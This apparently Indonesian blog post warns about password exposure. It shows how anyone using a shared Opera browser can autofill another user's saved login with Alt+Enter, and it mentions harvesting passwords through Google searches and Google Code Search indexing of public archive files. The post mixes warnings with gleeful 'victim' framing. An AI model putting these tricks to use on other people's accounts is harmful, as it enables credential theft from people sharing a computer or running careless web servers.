Saved password. Contoh lain adalah fasilitas wand password yang dimiliki oleh browser Opera. Saat anda memasukkan user name dan password pada suatu form dan menekan tombol submit, opera secara default akan meminta konfirmasi kepada anda apakah anda ingin browser menyimpan id dan password anda atau tidak. Lagi dan lagi… kebanyakan netter ceroboh, mereka cenderung untuk memilih opsi “YES”. Lalu?? Orang lain yang kemudian menggunakan browser itu bisa melihat situs apa saja yang telah diakses oleh user, arahkan browser ke situs tersebut, letakkan cursor pada form isian user name, tekan [ALT]+[ENTER] dan BOOOMM!!!! Kenapa?? Jangan kaget dulu!! Hehehe.. form login akan otomatis terisi dengan user name korban lengkap dengan passwordnya.

Google.com.
Banyak sudah situs yang runtuh, password dan nomor – nomor kartu kredit yang dicuri akibat dari ulah orang yang menyalahgunaan kesaktiannya Dahulu, hal ini mudah dilakukan.Hanya dengan mengetikkan kata kunci tertentu yang berkaitan dengan user name dan password, anda bisa memanen ratusan password user melalui google. Tapi sekarang tampaknya anda harus gigit jari jika menggunakan cara diatas Jangan sedih dulu karena Google baru saja menelurkan produk barunya, yaitu Google Code Search. Ancaman baru mulai timbul, “si pintar” ini kini dapat meng-crawl hingga kepada archive file yang berada di public directory web server. Hati-hati yang punya kebiasaan untuk menyimpan informasi penting di dalamnya (password, dan info berharga lainnya) Sebaiknya mulai sekarang kebiasaan itu dihilangkan. Selalu proteksi folder-folder yang sensitif agar situs anda bisa hidup lebih lama. Kalo nggak… yach.. tunggu ajah ada orang yang memanfaatkan produk baru google ini untuk mengeruk informasi sensitive dari web server anda. dan jika itu sudah terjadi… maka bersiaplah.. “taman bermain” anda akan diambil alih olehnya..

post

 

Blogger news